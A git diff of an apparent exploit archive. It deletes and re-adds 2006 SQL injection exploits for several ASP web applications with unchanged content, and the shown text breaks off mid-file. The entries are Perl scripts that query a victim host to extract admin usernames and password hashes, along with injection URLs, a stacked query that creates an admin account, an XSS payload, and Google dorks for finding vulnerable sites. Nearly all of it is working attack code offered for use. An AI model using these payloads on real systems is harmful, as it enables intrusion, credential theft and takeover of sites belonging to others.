- if ($answer =~ /

(.*?)<\/h3>/) { - print "- Exploit succeed! Getting admin's information\r\n"; - print "- Username: $1\r\n"; - } - if ($answer =~ /

(.*?)<\/p>/) { - print "- Password: $1\r\n"; - print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; - exit(); - } - if ($answer =~ /number of columns/) { - print "- This version of BetaParticle is vulnerable too\r\n"; - print "- but default query of SQL-Inj. does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - print "- Exploit failed\n" -} - -# milw0rm.com [2006-03-18] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=20 +#Usage: beta.pl +#googledork: [ "Powered by bp blog" ] 9.710 pages.. +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-20\r\n"; + print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to BetaParticle ex: /blog\r\n"; + exit(); +} +sub exploit () { + #Our variables... + $bpserver = $ARGV[0]; + $bpserver =~ s/(http:\/\/)//eg; + $bphost = "http://".$bpserver; + $bpdir = $ARGV[1]; + $bpport = "80"; + $bptar = "template_gallery_detail.asp?fldGalleryID="; + $bpfinal = "main.asp"; + $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; + $bpreq = $bphost.$bpdir.$bptar.$bpxp; + #Sending data... + header(); + print "- Trying to connect: $bpserver\r\n"; + $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; + print $bp "GET $bpreq HTTP/1.1\n"; + print $bp "Accept: */*\n"; + print $bp "Referer: $bphost\n"; + print $bp "Accept-Language: tr\n"; + print $bp "User-Agent: NukeZilla 4.3\n"; + print $bp "Cache-Control: no-cache\n"; + print $bp "Host: $bpserver\n"; + print $bp "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$bp>) { + if ($answer =~ /

(.*?)<\/h3>/) { + print "- Exploit succeed! Getting admin's information\r\n"; + print "- Username: $1\r\n"; + } + if ($answer =~ /

(.*?)<\/p>/) { + print "- Password: $1\r\n"; + print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; + exit(); + } + if ($answer =~ /number of columns/) { + print "- This version of BetaParticle is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + print "- Exploit failed\n" +} + +# milw0rm.com [2006-03-18] diff --git a/platforms/asp/webapps/1597.pl b/platforms/asp/webapps/1597.pl index a5b17335a..8b3167d7a 100755 --- a/platforms/asp/webapps/1597.pl +++ b/platforms/asp/webapps/1597.pl @@ -1,87 +1,87 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=21 -#Usage: aspp.pl -use IO::Socket; -use Math::BigInt; -if(@ARGV != 3) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-21\r\n"; - print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to ASPPortal ex: /portal/\r\n"; - print "- -> Username that you want password. ex: admin\r\n"; - exit(); -} -sub decrypt () -{ - $lp = length($appass); - $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJnew(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; - print $ap "GET $apreq HTTP/1.1\n"; - print $ap "Accept: */*\n"; - print $ap "Referer: $aphost\n"; - print $ap "Accept-Language: tr\n"; - print $ap "User-Agent: NukeZilla\n"; - print $ap "Cache-Control: no-cache\n"; - print $ap "Host: $apserver\n"; - print $ap "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$ap>) { - if ($answer =~ /string: "(.*?)"]'/) { - print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; - print "- Username: $ARGV[2]\r\n"; - print "- Decrypting password....\r\n"; - $appass = $1; - $appass =~ s/(")/chr(34)/eg; - $appass =~ s/(<)/chr(60)/eg; - $appass =~ s/(>)/chr(62)/eg; - $appass =~ s/( )/chr(32)/eg; - decrypt(); - } - if ($answer =~ /number of columns/) { - print "- This version of ASPPortal is vulnerable too\r\n"; - print "- but default query of SQL-Inj. does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -# milw0rm.com [2006-03-20] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=21 +#Usage: aspp.pl +use IO::Socket; +use Math::BigInt; +if(@ARGV != 3) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-21\r\n"; + print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to ASPPortal ex: /portal/\r\n"; + print "- -> Username that you want password. ex: admin\r\n"; + exit(); +} +sub decrypt () +{ + $lp = length($appass); + $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJnew(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; + print $ap "GET $apreq HTTP/1.1\n"; + print $ap "Accept: */*\n"; + print $ap "Referer: $aphost\n"; + print $ap "Accept-Language: tr\n"; + print $ap "User-Agent: NukeZilla\n"; + print $ap "Cache-Control: no-cache\n"; + print $ap "Host: $apserver\n"; + print $ap "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$ap>) { + if ($answer =~ /string: "(.*?)"]'/) { + print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; + print "- Username: $ARGV[2]\r\n"; + print "- Decrypting password....\r\n"; + $appass = $1; + $appass =~ s/(")/chr(34)/eg; + $appass =~ s/(<)/chr(60)/eg; + $appass =~ s/(>)/chr(62)/eg; + $appass =~ s/( )/chr(32)/eg; + decrypt(); + } + if ($answer =~ /number of columns/) { + print "- This version of ASPPortal is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# milw0rm.com [2006-03-20] diff --git a/platforms/asp/webapps/1623.pl b/platforms/asp/webapps/1623.pl index 2ba4b4bdb..02def2480 100755 --- a/platforms/asp/webapps/1623.pl +++ b/platforms/asp/webapps/1623.pl @@ -1,69 +1,69 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=22 -#Usage: ezasp.pl -#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-22\r\n"; - print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to EzASPSite ex: /ezasp/\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $ezserver = $ARGV[0]; - $ezserver =~ s/(http:\/\/)//eg; - $ezhost = "http://".$ezserver; - $ezdir = $ARGV[1]; - $ezport = "80"; - $eztar = "Default.asp?Scheme="; - $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; - $ezreq = $ezhost.$ezdir.$eztar.$ezxp; - #Sending data... - header(); - print "- Trying to connect: $ezserver\r\n"; - $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; - print $ez "GET $ezreq HTTP/1.1\n"; - print $ez "Accept: */*\n"; - print $ez "Referer: $ezhost\n"; - print $ez "Accept-Language: tr\n"; - print $ez "User-Agent: NukeZilla\n"; - print $ez "Cache-Control: no-cache\n"; - print $ez "Host: $ezserver\n"; - print $ez "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$ez>) { - if ($answer =~ //) { - print "- SHA1 HASH of PASSWORD: $1\r\n"; - exit(); - } - if ($answer =~ /number of columns/) { - print "- This version of EzASPSite is vulnerable too\r\n"; - print "- but default query of SQL-Inj. does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -# nukedx.com [2006-03-29] - -# milw0rm.com [2006-03-29] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=22 +#Usage: ezasp.pl +#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-22\r\n"; + print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to EzASPSite ex: /ezasp/\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $ezserver = $ARGV[0]; + $ezserver =~ s/(http:\/\/)//eg; + $ezhost = "http://".$ezserver; + $ezdir = $ARGV[1]; + $ezport = "80"; + $eztar = "Default.asp?Scheme="; + $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; + $ezreq = $ezhost.$ezdir.$eztar.$ezxp; + #Sending data... + header(); + print "- Trying to connect: $ezserver\r\n"; + $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; + print $ez "GET $ezreq HTTP/1.1\n"; + print $ez "Accept: */*\n"; + print $ez "Referer: $ezhost\n"; + print $ez "Accept-Language: tr\n"; + print $ez "User-Agent: NukeZilla\n"; + print $ez "Cache-Control: no-cache\n"; + print $ez "Host: $ezserver\n"; + print $ez "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$ez>) { + if ($answer =~ //) { + print "- SHA1 HASH of PASSWORD: $1\r\n"; + exit(); + } + if ($answer =~ /number of columns/) { + print "- This version of EzASPSite is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# nukedx.com [2006-03-29] + +# milw0rm.com [2006-03-29] diff --git a/platforms/asp/webapps/1700.pl b/platforms/asp/webapps/1700.pl index 377b7841e..2a6e9b77d 100755 --- a/platforms/asp/webapps/1700.pl +++ b/platforms/asp/webapps/1700.pl @@ -1,77 +1,77 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=23 -#Usage: aspsi.pl -use IO::Socket; -if(@ARGV != 3) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-23\r\n"; - print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to ASPSitem ex: /aspsitem/\r\n"; - print "- -> ID of user that you want info ex: 1\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $asserver = $ARGV[0]; - $asserver =~ s/(http:\/\/)//eg; - $ashost = "http://".$asserver; - $asdir = $ARGV[1]; - $asport = "80"; - $astar = "Haberler.asp?haber=devam&id="; - $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; - $asreq = $ashost.$asdir.$astar.$asxp; - #Sending data... - header(); - print "- Trying to connect: $asserver\r\n"; - $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; - print $as "GET $asreq HTTP/1.1\n"; - print $as "Accept: */*\n"; - print $as "Referer: $ashost\n"; - print $as "Accept-Language: tr\n"; - print $as "User-Agent: NukeZilla\n"; - print $as "Cache-Control: no-cache\n"; - print $as "Host: $asserver\n"; - print $as "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$as>) { - if ($answer =~ /class=\"tablo_baslik\">» (.*?)<\/b><\/td>/) { - if ($1 == $ARGV[2]) { - print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; - } - else { die "- Exploit failed\n"; } - } - if ($answer =~ /\" align=\"left\">(.*?)(.*?)<\/b>\)/) { - print "- MD5 HASH of PASSWORD: $1\r\n"; - } - if ($answer =~ /\| (.*?) ]
/) { - print "- Regdate: $1\r\n"; - } - if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { - print "- Email: $1\r\n"; - } - if ($answer =~ / Okunma : (.*?) /) { - print "- MD5 hash of answer: $1\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -#nukedx.com [2006-04-19] - -# milw0rm.com [2006-04-19] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=23 +#Usage: aspsi.pl +use IO::Socket; +if(@ARGV != 3) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-23\r\n"; + print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to ASPSitem ex: /aspsitem/\r\n"; + print "- -> ID of user that you want info ex: 1\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $asserver = $ARGV[0]; + $asserver =~ s/(http:\/\/)//eg; + $ashost = "http://".$asserver; + $asdir = $ARGV[1]; + $asport = "80"; + $astar = "Haberler.asp?haber=devam&id="; + $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; + $asreq = $ashost.$asdir.$astar.$asxp; + #Sending data... + header(); + print "- Trying to connect: $asserver\r\n"; + $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; + print $as "GET $asreq HTTP/1.1\n"; + print $as "Accept: */*\n"; + print $as "Referer: $ashost\n"; + print $as "Accept-Language: tr\n"; + print $as "User-Agent: NukeZilla\n"; + print $as "Cache-Control: no-cache\n"; + print $as "Host: $asserver\n"; + print $as "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$as>) { + if ($answer =~ /class=\"tablo_baslik\">» (.*?)<\/b><\/td>/) { + if ($1 == $ARGV[2]) { + print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; + } + else { die "- Exploit failed\n"; } + } + if ($answer =~ /\" align=\"left\">(.*?)(.*?)<\/b>\)/) { + print "- MD5 HASH of PASSWORD: $1\r\n"; + } + if ($answer =~ /\| (.*?) ]
/) { + print "- Regdate: $1\r\n"; + } + if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { + print "- Email: $1\r\n"; + } + if ($answer =~ / Okunma : (.*?) /) { + print "- MD5 hash of answer: $1\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +#nukedx.com [2006-04-19] + +# milw0rm.com [2006-04-19] diff --git a/platforms/asp/webapps/1714.txt b/platforms/asp/webapps/1714.txt index d5f9a1b71..13184e76c 100755 --- a/platforms/asp/webapps/1714.txt +++ b/platforms/asp/webapps/1714.txt @@ -1,18 +1,18 @@ -# BK Forum <= 4.0 Remote SQL Injection -# by n0m3rcy -# Copyright (c) 2006 n0m3rcy -# Exploit: - -First you must be logged in -Then type this in your browser - -http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 - -You will find admin's password - -# Shoutz: -nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00 - -# Have phun! - -# milw0rm.com [2006-04-24] +# BK Forum <= 4.0 Remote SQL Injection +# by n0m3rcy +# Copyright (c) 2006 n0m3rcy +# Exploit: + +First you must be logged in +Then type this in your browser + +http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 + +You will find admin's password + +# Shoutz: +nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00 + +# Have phun! + +# milw0rm.com [2006-04-24] diff --git a/platforms/asp/webapps/1759.txt b/platforms/asp/webapps/1759.txt index 3a88ece7b..5358fed4d 100755 --- a/platforms/asp/webapps/1759.txt +++ b/platforms/asp/webapps/1759.txt @@ -1,30 +1,30 @@ -VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com) - -people claimed there is some underground sploit for vp-asp 6.00 and I was sure that -if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ -well it didn't take me more then 5 minutes to find a bug in vp-asp. - -* the vendor was already notified. - -p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions -taken by people using the information in this document, if you don't agree please stop reading -and close this text document asap. - -* this information is for educational purposes only! - ----- - -The SQL Injection bug is in the shopcurrency.asp file under the "cid" query. - -quick hack to add user a/a: - -/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')-- - -and for those of you that don't know sql at all -this is how you remove the user 'a': - -/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'-- - --tracewar - -# milw0rm.com [2006-05-06] +VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com) + +people claimed there is some underground sploit for vp-asp 6.00 and I was sure that +if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ +well it didn't take me more then 5 minutes to find a bug in vp-asp. + +* the vendor was already notified. + +p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions +taken by people using the information in this document, if you don't agree please stop reading +and close this text document asap. + +* this information is for educational purposes only! + +---- + +The SQL Injection bug is in the shopcurrency.asp file under the "cid" query. + +quick hack to add user a/a: + +/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')-- + +and for those of you that don't know sql at all +this is how you remove the user 'a': + +/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'-- + +-tracewar + +# milw0rm.com [2006-05-06] diff --git a/platforms/asp/webapps/1807.txt b/platforms/asp/webapps/1807.txt index 8941f17b7..30561636d 100755 --- a/platforms/asp/webapps/1807.txt +++ b/platforms/asp/webapps/1807.txt @@ -1,21 +1,21 @@ -Zix Forum <= 1.12 (layid) SQL Injection Vulnerability - - -Vulnerability: --------------------- -SQL_Injection: -Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. -This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. -Successful exploitation extracts username and password of administrator in clear text . - - -Proof of Concepts: --------------------- -site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' -site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' - -------- - -By FarhadKey On 19 May 2006 - -# milw0rm.com [2006-05-19] +Zix Forum <= 1.12 (layid) SQL Injection Vulnerability + + +Vulnerability: +-------------------- +SQL_Injection: +Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. +This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. +Successful exploitation extracts username and password of administrator in clear text . + + +Proof of Concepts: +-------------------- +site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' +site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' + +------- + +By FarhadKey On 19 May 2006 + +# milw0rm.com [2006-05-19] diff --git a/platforms/asp/webapps/1833.txt b/platforms/asp/webapps/1833.txt index 105d3698a..9872ebf6b 100755 --- a/platforms/asp/webapps/1833.txt +++ b/platforms/asp/webapps/1833.txt @@ -1,11 +1,11 @@ -# Title : qjForum(member.asp) SQL Injection Vulnerability -# Author : ajann -# greetz : Nukedx,TheHacker -# Dork : "qjForum" -# Exploit: - -# Login before injection. - -### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member - -# milw0rm.com [2006-05-26] +# Title : qjForum(member.asp) SQL Injection Vulnerability +# Author : ajann +# greetz : Nukedx,TheHacker +# Dork : "qjForum" +# Exploit: + +# Login before injection. + +### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member + +# milw0rm.com [2006-05-26] diff --git a/platforms/asp/webapps/1834.asp b/platforms/asp/webapps/1834.asp index 38def82d0..c22f6a5d6 100755 --- a/platforms/asp/webapps/1834.asp +++ b/platforms/asp/webapps/1834.asp @@ -1,49 +1,49 @@ -ENGLISH -# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities -# Dork : "Copyright 2004 easy-content forums" -# Author : ajann -# Exploit; - -SQL INJECT.ON-------------------------------------------------------- -### http://[target]/[path]/userview.asp?startletter=SQL TEXT -### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x - -Example: -http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users - -XSS-------------------------------------------------------- -### http://[target]/[path]/userview.asp?startletter=xss TEXT -### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT - -Example: -http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X - - - - -TURKISH -# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities -# Sözcük[Arama] : "powered by phpmydirectory" -# Aç... Bulan : ajann -# Aç.k bulunan dosyalar; - -SQL INJECT.ON-------------------------------------------------------- -### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ -### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken - -Örnek: -http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users - -XSS-------------------------------------------------------- - -### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ -### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ - -Örnek: -http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r. - -Ac.klama: -userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir. -userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir. - -# milw0rm.com [2006-05-26] +ENGLISH +# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities +# Dork : "Copyright 2004 easy-content forums" +# Author : ajann +# Exploit; + +SQL INJECT.ON-------------------------------------------------------- +### http://[target]/[path]/userview.asp?startletter=SQL TEXT +### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x + +Example: +http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users + +XSS-------------------------------------------------------- +### http://[target]/[path]/userview.asp?startletter=xss TEXT +### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT + +Example: +http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X + + + + +TURKISH +# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities +# Sözcük[Arama] : "powered by phpmydirectory" +# Aç... Bulan : ajann +# Aç.k bulunan dosyalar; + +SQL INJECT.ON-------------------------------------------------------- +### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ +### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken + +Örnek: +http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users + +XSS-------------------------------------------------------- + +### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ +### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ + +Örnek: +http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r. + +Ac.klama: +userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir. +userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir. + +# milw0rm.com [2006-05-26] diff --git a/platforms/asp/webapps/1836.txt b/platforms/asp/webapps/1836.txt index 4fe21b45c..89fbe5b1b 100755 --- a/platforms/asp/webapps/1836.txt +++ b/platforms/asp/webapps/1836.txt @@ -1,7 +1,7 @@ -# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability -# Author : ajann - -# Exploit Example: -http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt - -# milw0rm.com [2006-05-27] +# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability +# Author : ajann + +# Exploit Example: +http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt + +# milw0rm.com [2006-05-27] diff --git a/platforms/asp/webapps/1837.pl b/platforms/asp/webapps/1837.pl index ac1541c77..a1127c9d5 100755 --- a/platforms/asp/webapps/1837.pl +++ b/platforms/asp/webapps/1837.pl @@ -1,204 +1,204 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original 